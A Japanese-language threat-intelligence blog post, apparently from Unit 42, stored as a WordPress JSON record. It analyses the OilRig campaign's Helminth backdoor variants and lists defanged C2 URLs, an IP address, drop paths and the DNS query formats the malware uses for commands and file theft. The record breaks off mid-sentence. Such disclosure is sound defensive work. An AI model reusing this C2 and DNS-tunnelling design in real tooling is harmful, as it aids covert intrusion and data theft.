{"id":106117,"date":"2016-10-04T13:10:37","date_gmt":"2016-10-04T20:10:37","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=106117"},"modified":"2020-04-08T01:48:28","modified_gmt":"2020-04-08T08:48:28","slug":"unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","title":{"rendered":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>\u6700\u521d\u306b\u516c\u958b\u3057\u305f<a href=\"https:\/\/blog.paloaltonetworks.com\/2016\/05\/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor\/\" data-page-track=\"true\" data-page-track-value=\"company:161005-unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets: section: \">2016\u5e745\u6708\u306b\u304a\u3051\u308bOilRig\u653b\u6483\u6d3b\u52d5<\/a>\u306e\u5206\u6790\u4ee5\u6765\u3001\u79c1\u305f\u3061\u306f\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306e\u65b0\u305f\u306a\u6d3b\u52d5\u306b\u3064\u3044\u3066\u76e3\u8996\u3092\u7d9a\u3051\u3066\u304d\u307e\u3057\u305f\u3002\u6700\u8fd1\u306e\u6570\u9031\u9593\u306b\u304a\u3044\u3066\u3001\u88ab\u5bb3\u8005\u306b\u5bfe\u3057\u3066\u7528\u3044\u3089\u308c\u308bHelminth\u30d0\u30c3\u30af\u30c9\u30a2\u3060\u3051\u3067\u306a\u304fClayslide\u914d\u4fe1\u6587\u66f8\u3082\u3001\u30b0\u30eb\u30fc\u30d7\u304c\u6d3b\u767a\u306b\u66f4\u65b0\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3057\u305f\u3002\u305d\u306e\u3046\u3048\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u304c\u6a19\u7684\u3068\u3059\u308b\u7d44\u7e54\u306e\u7bc4\u56f2\u306f\u3001\u30b5\u30a6\u30b8\u30a2\u30e9\u30d3\u30a2\u56fd\u5185\u306e\u7d44\u7e54\u3060\u3051\u3067\u306a\u304f\u3001\u30ab\u30bf\u30fc\u30eb\u56fd\u5185\u306e\u4f1a\u793e\u3084\u30c8\u30eb\u30b3\u3001\u30a4\u30b9\u30e9\u30a8\u30eb\u3001\u30a2\u30e1\u30ea\u30ab\u5408\u8846\u56fd\u306b\u3042\u308b\u653f\u5e9c\u6a5f\u95a2\u306b\u307e\u3067\u3082\u53ca\u3093\u3067\u3044\u307e\u3059\u3002<\/p>\n<h3><b>\u62e1\u5927\u3059\u308b\u6a19\u7684\u5bfe\u8c61<\/b><\/h3>\n<p>OilRig\u653b\u6483\u6d3b\u52d5\u306e\u80cc\u5f8c\u306b\u6f5c\u3080\u30b0\u30eb\u30fc\u30d7\u306f\u3001Microsoft\u306eExcel\u6587\u66f8\u3092\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u3068\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0 \u30e1\u30fc\u30eb\u3092\u60aa\u7528\u3057\u3066\u3001\u88ab\u5bb3\u8005\u306b\u5bfe\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4fb5\u5bb3\u3092\u3057\u7d9a\u3051\u3066\u3044\u307e\u3059\u3002\u4e00\u4f8b\u3068\u3057\u3066\u3001\u4e0b\u8a18\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u304c\u30c8\u30eb\u30b3\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u9001\u3089\u308c\u307e\u3057\u305f\u304c\u3001\u3053\u308c\u306f\u822a\u7a7a\u4f1a\u793e\u306eWeb\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u65b0\u3057\u3044\u30dd\u30fc\u30bf\u30eb \u30ed\u30b0\u30a4\u30f3\u3068\u79f0\u3059\u308b\u7591\u4f3c\u990c\u3092\u7528\u3044\u3066\u3044\u307e\u3057\u305f\u3002(\u306a\u304a\u3001\u4e0b\u56f3\u3067\u4f7f\u308f\u308c\u3066\u3044\u308b\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u9001\u4fe1\u8005\u306f\u8a50\u79f0\u3055\u308c\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002)<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_1.png\" alt=\"\u56f31 \u30c8\u30eb\u30b3\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u9001\u3089\u308c\u305f\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\" width=\"500\" height=\"342\" \/><figcaption class=\"wp-caption-text\">\u56f31 \u30c8\u30eb\u30b3\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u9001\u3089\u308c\u305f\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>\u30d5\u30a1\u30a4\u30ebusers.xls\u304c\u5b9f\u884c\u3055\u308c\u30de\u30af\u30ed\u304c\u6709\u52b9\u306b\u306a\u3063\u3066\u3044\u308b\u5834\u5408\u3001\u4e0b\u8a18\u306e\u304a\u3068\u308a\u6587\u66f8\u304c\u88ab\u5bb3\u8005\u306b\u63d0\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_2.png\" alt=\"\u56f32 \u60aa\u610f\u306e\u3042\u308bHelminth XLS\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9\" width=\"500\" height=\"426\" \/><figcaption class=\"wp-caption-text\">\u56f32 \u60aa\u610f\u306e\u3042\u308bHelminth XLS\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>\u307e\u3055\u306b\u3053\u308c\u3068\u540c\u3058\u6587\u66f8\u5185\u5bb9\u304c\u3001\u8907\u6570\u306e\u56fd\u306b\u3042\u308b\u653f\u5e9c\u6a5f\u95a2\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u308bHelminth\u30b5\u30f3\u30d7\u30eb\u3068\u3068\u3082\u306b\u4f7f\u308f\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u305d\u306e\u653b\u6483\u306b\u95a2\u3057\u3066\u4e0b\u8a18\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u76ee\u6483\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>Help-Yemen.xls<\/li>\n<li>xls<\/li>\n<\/ul>\n<p>\u3053\u3046\u3057\u305f\u5b9f\u4f8b\u306e\u307b\u304b\u306b\u3001\u30ab\u30bf\u30fc\u30eb\u306e\u8907\u6570\u306e\u6a5f\u95a2\u304c\u3001\u4eca\u5e74\u306f\u3058\u3081\u306eHelmnith\u30b5\u30f3\u30d7\u30eb\u3092\u904b\u3076\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u5bfe\u8c61\u3068\u306a\u3063\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u5834\u5408\u3001\u60aa\u610f\u306e\u3042\u308b\u30de\u30af\u30ed \u30b3\u30fc\u30c9\u3092\u904b\u3076\u306e\u306b\u4f7f\u308f\u308c\u305f\u6587\u66f8\u306f\u3001\u53d7\u4fe1\u5074\u306e\u7d44\u7e54\u3092\u975e\u5e38\u306b\u9650\u5b9a\u3057\u305f\u3082\u306e\u3067\u3057\u305f\u3002\u3042\u308b\u5834\u5408\u306b\u306f\u3001\u53d7\u4fe1\u8005\u3068\u3059\u3067\u306b\u95a2\u4fc2\u3092\u7bc9\u3044\u3066\u3044\u305f\u30d1\u30fc\u30c8\u30ca\u30fc\u6a5f\u95a2\u304b\u3089\u9001\u3089\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<h3><b>\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u306b\u5bfe\u3059\u308b\u66f4\u65b0<\/b><\/h3>\n<p>\u6700\u8fd1\u306e\u6570\u304b\u6708\u9593\u3001\u79c1\u305f\u3061\u306fOilRig\u306b\u95a2\u4e0e\u3059\u308b\u653b\u6483\u8005\u304c\u7528\u3044\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u5bfe\u3057\u3066\u591a\u6570\u306e\u5909\u66f4\u304c\u3055\u308c\u305f\u3053\u3068\u3092\u7a81\u304d\u3068\u3081\u307e\u3057\u305f\u3002\u904e\u53bb5\u304b\u6708\u9593\u3067\u7570\u306a\u308b\u4e9c\u7a2e\u30924\u3064\u7279\u5b9a\u3057\u307e\u3057\u305f\u304c\u3001\u5404\u4e9c\u7a2e\u306f\u5b9f\u884c\u6642\u306b\u7570\u306a\u308b\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u30c9\u30ed\u30c3\u30d7\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u4e9c\u7a2e\u306f\u3001\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u305f\u969b\u306b\u4e0b\u8a18\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u4f7f\u3044\u307e\u3059\u3002(FireEye\u793e\u306b\u306f\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u793e\u540d\u304c\u4f7f\u308f\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u767a\u898b\u6642\u306b\u901a\u5831\u3055\u308c\u307e\u3057\u305f\u3002)<\/p>\n<ul>\n<li>vbs \/ dns.ps1<\/li>\n<li>vbs \/ fireeye.ps1<\/li>\n<li>vbs \/ dn.ps1<\/li>\n<li>vbs \/ komisova.ps1<\/li>\n<\/ul>\n<p>\u4e0b\u8a18\u306e\u6642\u7cfb\u5217\u30c1\u30e3\u30fc\u30c8\u306f\u3001\u5404\u4e9c\u7a2e\u306e\u6d41\u884c\u3092\u793a\u3057\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n<p>\u30d5\u30a1\u30a4\u30ebusers.xls\u304c\u5b9f\u884c\u3055\u308c\u30de\u30af\u30ed\u304c\u6709\u52b9\u306b\u306a\u3063\u3066\u3044\u308b\u5834\u5408\u3001\u4e0b\u8a18\u306e\u304a\u3068\u308a\u6587\u66f8\u304c\u88ab\u5bb3\u8005\u306b\u63d0\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_3.png\" alt=\"\u56f33 \u6642\u9593\u7d4c\u904e\u306b\u4f34\u3046Helminth\u4e9c\u7a2e\" width=\"500\" height=\"334\" \/><figcaption class=\"wp-caption-text\">\u56f33 \u6642\u9593\u7d4c\u904e\u306b\u4f34\u3046Helminth\u4e9c\u7a2e<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>\u4e0a\u8a18\u306e\u6642\u7cfb\u5217\u30c1\u30e3\u30fc\u30c8\u3067\u5206\u304b\u308b\u3068\u304a\u308a\u3001\u653b\u6483\u8005\u306f\u30012016\u5e745\u6708\u672b\u306b\u30de\u30eb\u30a6\u30a7\u30a2\u306eupdate.vbs\u4e9c\u7a2e\u304b\u3089fireeye.vbs\u4e9c\u7a2e\u3078\u3068\u5229\u7528\u5bfe\u8c61\u3092\u5207\u308a\u66ff\u3048\u307e\u3057\u305f\u3002\u3055\u3089\u306b\u6700\u8fd1\u306b\u306a\u308b\u3068\u3001upd.vbs\u4e9c\u7a2e\u304c\u767a\u898b\u3055\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306f\u6d3b\u767a\u306b\u958b\u767a\u3055\u308c\u305f\u3082\u306e\u306e\u3088\u3046\u306b\u898b\u53d7\u3051\u3089\u308c\u307e\u3059\u3002\u30b3\u30e1\u30f3\u30c8\u3092\u306f\u3058\u3081\u3068\u3059\u308b\u75d5\u8de1\u304c\u3053\u306e\u4e9c\u7a2e\u306e\u4e2d\u306b\u767a\u898b\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u305d\u308c\u306b\u3064\u3044\u3066\u306f\u3053\u306e\u8a18\u4e8b\u306e\u5f8c\u534a\u3067\u8a73\u3057\u304f\u8003\u5bdf\u3057\u307e\u3059\u3002\u3053\u308c\u3088\u308a\u3082\u3055\u3089\u306b\u6700\u8fd1\u306b\u306a\u308b\u3068\u3001komisova.vbs\u4e9c\u7a2e\u304c\u4f7f\u308f\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u5224\u660e\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3><b>\u4e9c\u7a2e\u9593\u3067\u306eVBScript\u306e\u5909\u66f4<\/b><\/h3>\n<p>\u5168\u4f53\u7684\u306b\u3001\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u305fVBS\u30d5\u30a1\u30a4\u30eb\u306b\u304a\u3051\u308b\u5909\u66f4\u306f\u3001\u4e9c\u7a2e\u9593\u3067\u306f\u6700\u5c0f\u9650\u306e\u3082\u306e\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u3053\u3067\u304a\u3055\u3089\u3044\u3067\u3059\u304c\u3001VBS\u30b9\u30af\u30ea\u30d7\u30c8\u306fHTTP\u3092\u4f7f\u3063\u3066\u30ea\u30e2\u30fc\u30c8\u306e\u30b5\u30fc\u30d0\u3068\u901a\u4fe1\u3059\u308b\u5f79\u5272\u3092\u62c5\u3044\u307e\u3059\u3002\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066\u306f\u3001\u305d\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u5165\u624b\u53ef\u80fd\u306a\u5834\u5408\u306b\u306f\u5b9f\u884c\u306b\u79fb\u308b\u3001\u3068\u3044\u3046\u3053\u3068\u3092\u7e70\u308a\u8fd4\u3057\u8a66\u307f\u307e\u3059\u3002\u6b21\u306b\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u51fa\u529b\u306f\u5225\u306eHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u3088\u3063\u3066\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u307e\u3059\u3002\u307e\u305f\u3001\u30d5\u30a1\u30a4\u30eb\u306fClayslide\u306eExcel\u6587\u66f8\u304c\u30c9\u30ed\u30c3\u30d7\u3057\u305fPowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u3082\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p>\u89b3\u6e2c\u3055\u308c\u3066\u3044\u308b\u4e9c\u7a2e\u9593\u3067\u306f\u3001\u6982\u3057\u3066\u9055\u3044\u306f\u308f\u305a\u304b\u3067\u3059\u3002\u5927\u304d\u306a\u9055\u3044\u306f\u3001\u4f7f\u308f\u308c\u3066\u3044\u308b\u30c9\u30e1\u30a4\u30f3\u3068IP\u30a2\u30c9\u30ec\u30b9\u306e\u3088\u3046\u306b\u898b\u53d7\u3051\u3089\u308c\u307e\u3059\u3002\u4e0b\u8a18\u306eURL\u306f\u3001\u5404\u4e9c\u7a2e\u304c\u4f7f\u3063\u3066\u3044\u308b\u3082\u306e\u3067\u3059\u3002<\/p>\n<h4><b>update.vbs<\/b><\/h4>\n<ul>\n<li>hxxp:\/\/winodwsupdates[.]me\/counter.aspx?req=<\/li>\n<li>hxxp:\/\/go0gIe[.]com\/sysupdate.aspx?req=<\/li>\n<\/ul>\n<h4><b>fireeye.vbs<\/b><\/h4>\n<ul>\n<li>hxxp:\/\/update-kernal[.]net\/update-index.aspx?req=<\/li>\n<li>hxxp:\/\/upgradesystems[.]info\/upgrade-index.aspx?req=<\/li>\n<li>hxxp:\/\/yahoooooomail[.]com\/update-index.aspx?req=<\/li>\n<li>hxxp:\/\/googleupdate[.]download\/update-index.aspx?req=<\/li>\n<\/ul>\n<h4><b>upd.vbs<\/b><\/h4>\n<ul>\n<li>hxxp:\/\/83.142.230[.]138:7020\/update.php?req=<\/li>\n<\/ul>\n<h4><b>komisova.vbs<\/b><\/h4>\n<ul>\n<li>hxxp:\/\/googleupdate[.]download\/update-index.aspx?req=<\/li>\n<\/ul>\n<p>2\u30013\u306e\u6ce8\u610f\u70b9\u3068\u3057\u3066\u3001fireeye.vbs\u4e9c\u7a2e\u306e\u4e2d\u306b\u8a8d\u3081\u3089\u308c\u305f\u3082\u306e\u3068\u540c\u3058URL\u3092komisova.vbs\u4e9c\u7a2e\u304c\u4f7f\u3063\u3066\u3044\u308b\u3068\u3044\u3046\u70b9\u3082\u6319\u3052\u3089\u308c\u307e\u3059\u3002\u3053\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u3054\u304f\u6700\u8fd1\u306efireeye.vbs\u4e9c\u7a2e\u306e\u4e2d\u306b\u3057\u304b\u898b\u3089\u308c\u306a\u304b\u3063\u305f\u3053\u3068\u306f\u6307\u6458\u3057\u3066\u304a\u304f\u4fa1\u5024\u304c\u3042\u308a\u307e\u3059\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u653b\u6483\u8005\u304ckomisova\u3078\u3068\u5207\u308a\u66ff\u3048\u3066\u3044\u308b\u904e\u6e21\u671f\u3067fireeye.vbs\u4e9c\u7a2e\u304c\u4f7f\u308f\u308c\u305f\u53ef\u80fd\u6027\u304c\u975e\u5e38\u306b\u9ad8\u3044\u3068\u8a00\u3048\u307e\u3059\u3002<\/p>\n<p>upd.vbs\u3092\u30c9\u30ed\u30c3\u30d7\u3059\u308bExcel\u30d5\u30a1\u30a4\u30eb\u304c\u3001\u304a\u305d\u3089\u304f\u958b\u767a\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u3042\u308b\u3053\u3068\u306f\u4ee5\u524d\u306b\u8ff0\u3079\u307e\u3057\u305f\u3002\u3053\u306e\u4e3b\u5f35\u3092\u88cf\u4ed8\u3051\u308b\u8a3c\u62e0\u3068\u3057\u3066\u3001\u975e\u6a19\u6e96\u30dd\u30fc\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3044\u308bIP\u30a2\u30c9\u30ec\u30b9\u63a5\u7d9a\u304c\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u3068\u3044\u3046\u4e8b\u5b9f\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u306eIP\u30a2\u30c9\u30ec\u30b9\u306e\u7279\u306b\u8208\u5473\u6df1\u3044\u7279\u9577\u306e1\u3064\u306f\u3001\u305d\u308c\u304c<a href=\"https:\/\/www.symantec.com\/content\/en\/us\/enterprise\/media\/security_response\/docs\/CadelSpy-Remexi-IOC.pdf\" data-page-track=\"true\" data-page-track-value=\"company:161005-unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets: section: \">2015\u5e74\u306e\u66ae\u308c\u306bSymantec\u306b\u3088\u3063\u3066\u767a\u884c\u3055\u308c\u305f<\/a>Remexi\u30ec\u30dd\u30fc\u30c8\u306b\u95a2\u9023\u3057\u3066\u3044\u308b\u70b9\u3067\u3059\u3002\u3053\u308c\u306f\u3001\u3053\u308c\u3089\u306e\u653b\u6483\u306e\u80cc\u5f8c\u306b\u30a4\u30e9\u30f3\u3092\u62e0\u70b9\u3068\u3059\u308b\u653b\u6483\u8005\u304c\u3044\u308b\u3068\u63a8\u6e2c\u3059\u308b\u524d\u51fa\u306e\u8a3c\u62e0\u3068\u5408\u81f4\u3057\u307e\u3059\u3002<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_4.png\" alt=\"\u56f34 IP\u30a2\u30c9\u30ec\u30b9\u3068Remexi\u306e\u95a2\u4fc2(PassiveTotal\u306b\u793a\u3055\u308c\u308b)\" width=\"500\" height=\"214\" \/><figcaption class=\"wp-caption-text\">\u56f34 IP\u30a2\u30c9\u30ec\u30b9\u3068Remexi\u306e\u95a2\u4fc2(PassiveTotal\u306b\u793a\u3055\u308c\u308b)<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>upd.vbs\u306e\u57fa\u76e4\u3068\u306a\u308b\u30b3\u30fc\u30c9\u306f\u3001\u4ed6\u306e\u4e9c\u7a2e\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001\u304b\u306a\u308a\u6574\u7136\u3068\u3057\u3066\u3044\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002\u3053\u308c\u306f\u3001\u305d\u308c\u304c\u7a4d\u6975\u7684\u306b\u958b\u767a\u3055\u308c\u3066\u3044\u308b\u3068\u3044\u3046\u3055\u3089\u306a\u308b\u8a3c\u62e0\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_5.png\" alt=\"\u56f35 IP\u30a2\u30c9\u30ec\u30b9\u3068Remexi\u306e\u95a2\u4fc2(PassiveTotal\u306b\u793a\u3055\u308c\u308b)\" width=\"500\" height=\"253\" \/><figcaption class=\"wp-caption-text\">\u56f35 IP\u30a2\u30c9\u30ec\u30b9\u3068Remexi\u306e\u95a2\u4fc2(PassiveTotal\u306b\u793a\u3055\u308c\u308b)<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>upd.vbs\u4e9c\u7a2e\u306b\u898b\u3089\u308c\u308b\u3082\u30461\u3064\u306e\u30de\u30a4\u30ca\u30fc\u306a\u9055\u3044\u306f\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u5834\u6240\u3067\u3059\u3002\u4ed6\u306e3\u3064\u306e\u4e9c\u7a2e\u306f\u3059\u3079\u3066\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u30d5\u30a1\u30a4\u30eb\u3092%PUBLIC%\/Libraries\u5185\u306b\u3042\u308b\u30b5\u30d6\u30d5\u30a9\u30eb\u30c0\u5185\u306b\u914d\u7f6e\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u3053\u306e\u7279\u5b9a\u306e\u4e9c\u7a2e\u306f\u3001\u305d\u306e\u30d5\u30a1\u30a4\u30eb\u3092%USERPROFILE%\/AppData\/Local\/Microsoft\/Media\/\u5185\u306b\u3042\u308b\u30b5\u30d6\u30d5\u30a9\u30eb\u30c0\u306b\u914d\u7f6e\u3057\u307e\u3059\u3002<\/p>\n<h3><b>\u4e9c\u7a2e\u9593\u3067\u306ePS1\u306e\u5909\u66f4<\/b><\/h3>\n<p>VBS\u30d5\u30a1\u30a4\u30eb\u3068\u540c\u69d8\u306b\u3001PS1\u30d5\u30a1\u30a4\u30eb\u3082\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u3068\u901a\u4fe1\u3057\u307e\u3059\u3002VBS\u30d5\u30a1\u30a4\u30eb\u3068\u306f\u7570\u306a\u308a\u3001PS1\u30d5\u30a1\u30a4\u30eb\u306fHTTP\u3067\u306f\u306a\u304fDNS\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u30b3\u30de\u30f3\u30c9\u3068\u30d5\u30a1\u30a4\u30eb\u306e\u5834\u6240\u306f\u3001\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u306b\u3088\u3063\u3066\u53d7\u4fe1\u3055\u308c\u3001\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306e\u51fa\u529b\u306f\u8ffd\u52a0\u306eDNS\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u4ecb\u3057\u3066\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u767a\u751f\u65b9\u6cd5\u306e\u7dbf\u5bc6\u306a\u5206\u6790\u306b\u3064\u3044\u3066\u306f\u3001\u4ee5\u524d\u306e<a href=\"https:\/\/blog.paloaltonetworks.com\/2016\/05\/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor\/\" data-page-track=\"true\" data-page-track-value=\"company:161005-unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets: section: \">OilRig\u30d6\u30ed\u30b0\u8a18\u4e8b<\/a>\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u6982\u3057\u3066\u3001dns\u3001fireeye\u3001komisova\u306ePS1\u4e9c\u7a2e\u306e\u9593\u306b\u306f\u304b\u306a\u308a\u30de\u30a4\u30ca\u30fc\u306a\u9055\u3044\u304c\u3042\u308a\u307e\u3059\u3002\u305f\u3060\u3057\u3001dn.ps1\u4e9c\u7a2e\u306f\u5927\u5e45\u306b\u66f4\u65b0\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\u3053\u308c\u3089\u306e\u66f4\u65b0\u306b\u52a0\u3048\u3001\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u304b\u306a\u308a\u30b3\u30e1\u30f3\u30c8\u304c\u52a0\u3048\u3089\u308c\u3066\u304a\u308a\u3001\u7279\u5b9a\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u7a4d\u6975\u7684\u306b\u958b\u767a\u3055\u308c\u305f\u3068\u3044\u3046\u3055\u3089\u306a\u308b\u8a3c\u62e0\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<div>\n<div align=\"center\">\n<figure style=\"width: 500px\" class=\"wp-caption aligncenter\"><img  data-src=\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/pan\/ja_JP\/Images\/blog\/OilRig_6.png\" alt=\"\u56f36 dn.ps1\u4e9c\u7a2e\u306e\u5148\u982d\u90e8\u5206\" width=\"500\" height=\"861\" \/><figcaption class=\"wp-caption-text\">\u56f36 dn.ps1\u4e9c\u7a2e\u306e\u5148\u982d\u90e8\u5206<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<p>dn.ps1\u4e9c\u7a2e\u306f\u3001\u6b21\u306e\u7279\u6027\u3092\u5099\u3048\u305fDNS\u30af\u30a8\u30ea\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<div align=\"center\"><\/div>\n<pre align=\"center\" style=\"text-align: left;\" class=\"\">rne_[victim_id]_[random].hostname\r\nrd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nbne_[victim_id]_random].hostname\r\nbd_[victim_id]_[filename]_[file_size]_[random].hostname\r\nu_[victim_id]_[filename]_[byte_position]_[random].hostname<\/pre>\n<p>\u4e0a\u8a18\u306e\u30af\u30a8\u30ea\u3067\u306f\u3001\u2018rne\u2019\u30b3\u30de\u30f3\u30c9\u304c\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u306b\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u7528\u306b\u6b63\u5e38\u306a\u30d5\u30a1\u30a4\u30eb\u304c\u4f7f\u7528\u53ef\u80fd\u304b\u3069\u3046\u304b\u3092\u554f\u3044\u5408\u308f\u305b\u307e\u3059\u3002\u4f7f\u7528\u53ef\u80fd\u306a\u5834\u5408\u3001\u30b5\u30fc\u30d0\u306f\u2018OK\u2019\u3068\u30ec\u30b9\u30dd\u30f3\u30b9\u3092\u8fd4\u3057\u3001\u7d9a\u3044\u3066\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u8fd4\u3057\u307e\u3059\u3002\u3053\u306e\u72b6\u6cc1\u3067\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u2018rd\u2019\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3001\u5b9f\u969b\u306b\u5bfe\u8c61\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002<\/p>\n<p>\u540c\u69d8\u306b\u3001\u2018bne\u2019\u30b3\u30de\u30f3\u30c9\u3068\u2018bd\u2019\u30b3\u30de\u30f3\u30c9\u3067\u3082\u305d\u308c\u305e\u308c\u540c\u3058\u5b9f\u884c\u30d5\u30ed\u30fc\u304c\u898b\u3089\u308c\u307e\u3059\u3002\u3053\u306e\u7279\u5b9a\u306e\u52d5\u4f5c\u306f\u30d0\u30c3\u30c1 